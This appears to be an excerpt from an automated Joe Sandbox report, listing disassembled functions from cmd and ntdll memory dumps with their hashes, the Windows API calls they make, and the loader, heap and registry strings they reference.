                                                                                        • Opcode ID: d519814763d7daee53dd54e8c8abdedfb05905165a955f9fb911c72c7df100e9
                                                                                        • Instruction ID: 970541c572878d9f918dd981a3040312d8938961f076cb38ee656274ede9b55f
                                                                                        • Opcode Fuzzy Hash: d519814763d7daee53dd54e8c8abdedfb05905165a955f9fb911c72c7df100e9
                                                                                        • Instruction Fuzzy Hash: EF31C436A00254FFCB51DB58CC89F9EB7B8FF46764F1540AAF816AB291D770E940CA60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtOpenThreadToken.NTDLL ref: 00D76454
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00D7646C
                                                                                        • NtClose.NTDLL ref: 00D764BD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: OpenToken$CloseProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2991381754-0
                                                                                        • Opcode ID: 33b0137e4b20670bd8194d0cfb6211c48b2c5022b21c069bc9629a2e32c3caf6
                                                                                        • Instruction ID: 870c01ba0d84c7cd0447f23500c4895e0e038a645c649d164e5550100683ee34
                                                                                        • Opcode Fuzzy Hash: 33b0137e4b20670bd8194d0cfb6211c48b2c5022b21c069bc9629a2e32c3caf6
                                                                                        • Instruction Fuzzy Hash: 4611DA32D04716EFDB109B64D848B9DB778EB44329F248665E519A7280F774DE08C7B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ $0
                                                                                        • API String ID: 0-3352262554
                                                                                        • Opcode ID: d919797c7dac21642a0b4becb6b54ed88f6ee0b9382ce2dd571ff44ad7dbe36e
                                                                                        • Instruction ID: 3e4bda8b4f543f0e603a65e3cfa33ffde62880c8758801824e9b63cc08ea04a5
                                                                                        • Opcode Fuzzy Hash: d919797c7dac21642a0b4becb6b54ed88f6ee0b9382ce2dd571ff44ad7dbe36e
                                                                                        • Instruction Fuzzy Hash: 413212B16083819FDB50DF68C884BABFBE5BF88348F04496EF59987250D774E948CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 03AE1632
                                                                                        • HEAP: , xrefs: 03AE14B6
                                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03AE1648
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        • Opcode ID: 2b77e5e92c9cc3b3c3b1196d302f86aba1cd74c1ded52ac8ff83d793a74254d6
                                                                                        • Instruction ID: b30a41da0cefd00a9e3e75a57de42c9f1730ec7af71a6672bf1443c5063be1c8
                                                                                        • Opcode Fuzzy Hash: 2b77e5e92c9cc3b3c3b1196d302f86aba1cd74c1ded52ac8ff83d793a74254d6
                                                                                        • Instruction Fuzzy Hash: 2CE1F271A042659FDB28CF28C451BBABBF5EF49304F1888AEE496CB345E734E941CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                        • API String ID: 0-2391371766
                                                                                        • Opcode ID: 7b54224e37ea211c494cbd3c639fd910eb5f07ea0d6e89ce157a834a5e81abbd
                                                                                        • Instruction ID: 7c8607868996d76eb8dfeeede6fe07da162cced34db9978a9cfc051c220e79f3
                                                                                        • Opcode Fuzzy Hash: 7b54224e37ea211c494cbd3c639fd910eb5f07ea0d6e89ce157a834a5e81abbd
                                                                                        • Instruction Fuzzy Hash: 07B1E379609341AFD711DF54C980B2BB7E8EB44718F0409BAFA499B2A1D778E804CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                        • API String ID: 0-2779062949
                                                                                        • Opcode ID: a741d1b21744922cd5bb072720143b3c35397376a36b1115fb5fbb4885a8904d
                                                                                        • Instruction ID: c5f8f8750d536c913a3bc7e2ee1ed5ab4febf27b7b9482ee02f741bee5b336bb
                                                                                        • Opcode Fuzzy Hash: a741d1b21744922cd5bb072720143b3c35397376a36b1115fb5fbb4885a8904d
                                                                                        • Instruction Fuzzy Hash: E3A18C359016299BDF31DF64CC88BEABBB8EF05708F1405EAE909AB250D7359E84CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                        • API String ID: 0-318774311
                                                                                        • Opcode ID: 3d028ef3f8971775231b98fd3d53f79ccb485e57e714f6ae7b78db7accd5fa5a
                                                                                        • Instruction ID: 874adabfb6aabb9634f6734b00cab367ecf6b8d72d6730509c5d3e4a23c34973
                                                                                        • Opcode Fuzzy Hash: 3d028ef3f8971775231b98fd3d53f79ccb485e57e714f6ae7b78db7accd5fa5a
                                                                                        • Instruction Fuzzy Hash: 8681A079608340AFD725CB14C844B6AB7E8EF84758F0909ADF9A9DB390DB74D900DB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                        • API String ID: 0-373624363
                                                                                        • Opcode ID: 1ab8d1e1474a219dbad4335b595cf3ca3dd28787a2c6ee5b7036e2fe32955938
                                                                                        • Instruction ID: 7760b2fe0f0836b2a94fab4582279ec233229c30051c7eca87ecaa6da40804d2
                                                                                        • Opcode Fuzzy Hash: 1ab8d1e1474a219dbad4335b595cf3ca3dd28787a2c6ee5b7036e2fe32955938
                                                                                        • Instruction Fuzzy Hash: EE91B075A08255CFDB21CF58D4547ADB7B4FF05318F1C41AAE826AB390D3789A80CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • GlobalizationUserSettings, xrefs: 03BBB3B4
                                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03BBB3AA
                                                                                        • TargetNtPath, xrefs: 03BBB3AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                        • API String ID: 0-505981995
                                                                                        • Opcode ID: 69d374677fa24ead71df4f24333040f26cb73258f115346735da58f836fcf854
                                                                                        • Instruction ID: 69c1c35613058930a169ba3c9a6a4381787dff3dcad8c2df788e7e5ca4212fc8
                                                                                        • Opcode Fuzzy Hash: 69d374677fa24ead71df4f24333040f26cb73258f115346735da58f836fcf854
                                                                                        • Instruction Fuzzy Hash: 4C615D72D41229AFDB21DB54DC98BEAB7B8FB44714F0501E9E509AB250DBB4DE80CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                        • API String ID: 0-2283098728
                                                                                        • Opcode ID: ca1e2fa0385aefa91a02c8afe5a1bc828adf24b3b12e7d8b8013bc682ca19343
                                                                                        • Instruction ID: e457f2443ae5401f4ed35e406e1e40d0fe930a90a53045471e9c5f23e51beab9
                                                                                        • Opcode Fuzzy Hash: ca1e2fa0385aefa91a02c8afe5a1bc828adf24b3b12e7d8b8013bc682ca19343
                                                                                        • Instruction Fuzzy Hash: 3D51C0357007019FC724EF28C984B29BBA5FB8461CF1806FDE5569B6E6E7709804CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • LdrpCheckRedirection, xrefs: 03B6450F
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 03B64519
                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03B64508
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 0-3154609507
                                                                                        • Opcode ID: 59ab371b1947fb6c8c7d8c64090ae18cf806b667bc69f637a1cf9ec97a184696
                                                                                        • Instruction ID: 5178f0351515828011b7d003acfb4e94757c113a0276ab6d5dedc570be652e70
                                                                                        • Opcode Fuzzy Hash: 59ab371b1947fb6c8c7d8c64090ae18cf806b667bc69f637a1cf9ec97a184696
                                                                                        • Instruction Fuzzy Hash: 0441D332605B119FCB21CF5AD941A66B7E8FFC9658F0906F9EC58DB257DB38D8008B81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • RtlCreateActivationContext, xrefs: 03B52803
                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 03B52808
                                                                                        • Actx , xrefs: 03B132CC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                        • API String ID: 0-859632880
                                                                                        • Opcode ID: 10300c21cd745772c587350c6625d488a3eaa63d9560cab7c9b8eb3871c8272e
                                                                                        • Instruction ID: 0b711f63a47ee80bb4ada9a2e89deaee9ee1c3498e59c0f026568c1c63f0939c
                                                                                        • Opcode Fuzzy Hash: 10300c21cd745772c587350c6625d488a3eaa63d9560cab7c9b8eb3871c8272e
                                                                                        • Instruction Fuzzy Hash: 8A3142366003049FDB16CE58E890B9AB7E4EF04718F4844B9FD098F286EB74E915CBE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 03B6B2B2
                                                                                        • @, xrefs: 03B6B2F0
                                                                                        • GlobalFlag, xrefs: 03B6B30F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                        • API String ID: 0-4192008846
                                                                                        • Opcode ID: 7b25454902e73662e342cbfa7d7f53edcbb9da41a2fe9a636ed884ccb7129e37
                                                                                        • Instruction ID: 25c097f0d56f7ae7d1cc992c73dca9a52003ed04adf1a890caf913e66f9605d2
                                                                                        • Opcode Fuzzy Hash: 7b25454902e73662e342cbfa7d7f53edcbb9da41a2fe9a636ed884ccb7129e37
                                                                                        • Instruction Fuzzy Hash: FC314D75A00219AEDB10EF95DD81AEEBBBCEF44748F4504BAE605EB241D7789F048B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • @, xrefs: 03B211C5
                                                                                        • BuildLabEx, xrefs: 03B2122F
                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03B2119B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                        • API String ID: 0-3051831665
                                                                                        • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                        • Instruction ID: 24d4cb53356321421fc38bd4d21cd45c158b571698c1a3f8c7db5fc2648970a5
                                                                                        • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                        • Instruction Fuzzy Hash: F0317076900229BBDB11DB94CC44EAEBF7DEB84758F004675F908EB260D730DA058BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@
                                                                                        • API String ID: 0-149943524
                                                                                        • Opcode ID: 0d41a6867b30c0a4716d69f221fc743b09dfab64f73e523aa8209635aff31c6d
                                                                                        • Instruction ID: d88d6d41ce26eb6efa202c3651e2184f48e38b6300882e569ca94c2fb61f13ca
                                                                                        • Opcode Fuzzy Hash: 0d41a6867b30c0a4716d69f221fc743b09dfab64f73e523aa8209635aff31c6d
                                                                                        • Instruction Fuzzy Hash: 18327B749083118FC728CF99C490B3AF7E5EF8A704F18496EFA958B290E734D945DB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtQueryInformationToken.NTDLL ref: 00D7652A
                                                                                        • NtQueryInformationToken.NTDLL ref: 00D82028
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationQueryToken
                                                                                        • String ID:
                                                                                        • API String ID: 4239771691-0
                                                                                        • Opcode ID: c8bd8fbb47c5079e39ff0e25e1cf91718b1b4e99369cc1066c5708b7db323d78
                                                                                        • Instruction ID: f105edabed1b087d96ad36ef6d02046c4ec5b134b24395ac20ccfcd9a964dfc9
                                                                                        • Opcode Fuzzy Hash: c8bd8fbb47c5079e39ff0e25e1cf91718b1b4e99369cc1066c5708b7db323d78
                                                                                        • Instruction Fuzzy Hash: D7017171A00208BBEB20DB58C844BFABBFCEB45711F1440A6E604E6044F3B0DA49EB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 00D7484F
                                                                                        • GetFileInformationByHandleEx.API-MS-WIN-CORE-FILE-L2-1-0(000000FF,0000000D,?,00000074), ref: 00D80993
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInformation$HandleQueryVolume
                                                                                        • String ID:
                                                                                        • API String ID: 2149833895-0
                                                                                        • Opcode ID: e097141b3ee729c1f07495db628c7fe4df3ea7805a348564b8f403bc3799c2dc
                                                                                        • Instruction ID: d0f8a662cf68625a9cca825265da76205bd5bdfdbbc92e827ba505bf4b2aa1a0
                                                                                        • Opcode Fuzzy Hash: e097141b3ee729c1f07495db628c7fe4df3ea7805a348564b8f403bc3799c2dc
                                                                                        • Instruction Fuzzy Hash: 2201D831A0021CAAE7309B669C05FAE77B8EB45B24F414129E904D3181EBB499098BB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,?,00D7A4C2,00D8E590,?,00002000), ref: 00D848F4
                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,00000000,?,00D7A4C2,00D8E590,?,00002000), ref: 00D84940
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$System$File
                                                                                        • String ID:
                                                                                        • API String ID: 2838179519-0
                                                                                        • Opcode ID: d3d1d2c39d7035b5caf0f5d3ebeb3aa22f00124ce2617f9f67a6cd0ae4df34f2
                                                                                        • Instruction ID: 6f0b4019f1aca97fc6f901622fb3c26ec8629318284dc0e098ad578f664d7550
                                                                                        • Opcode Fuzzy Hash: d3d1d2c39d7035b5caf0f5d3ebeb3aa22f00124ce2617f9f67a6cd0ae4df34f2
                                                                                        • Instruction Fuzzy Hash: 2701E96C91024A9A8B04EFA4D5045EEB774FF59704B215099E819E7311E731CE43CB7A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Legacy$UEFI
                                                                                        • API String ID: 2994545307-634100481
                                                                                        • Opcode ID: 9f20b753b63ade553e4f58b4228d02f40c0140805a7f5c52290390b62017255b
                                                                                        • Instruction ID: afb7e560759ff491f43814c17fd445cb8a22aa76f50ae67a07ee2344e7d29679
                                                                                        • Opcode Fuzzy Hash: 9f20b753b63ade553e4f58b4228d02f40c0140805a7f5c52290390b62017255b
                                                                                        • Instruction Fuzzy Hash: D5613C71A003189FDB15DFA8D940BADBBB9FB48708F1445BAF949EB251E730DA00CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 03AEA21B
                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 03AEA229
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                        • API String ID: 0-2876891731
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
• API String ID: 0-118005554
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: .Local\$@
• API String ID: 0-380025441
Uniqueness
Uniqueness Score: -1.00%

Strings
• SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 03B5289F
• RtlpInitializeAssemblyStorageMap, xrefs: 03B5289A
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
• API String ID: 0-2653619699
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
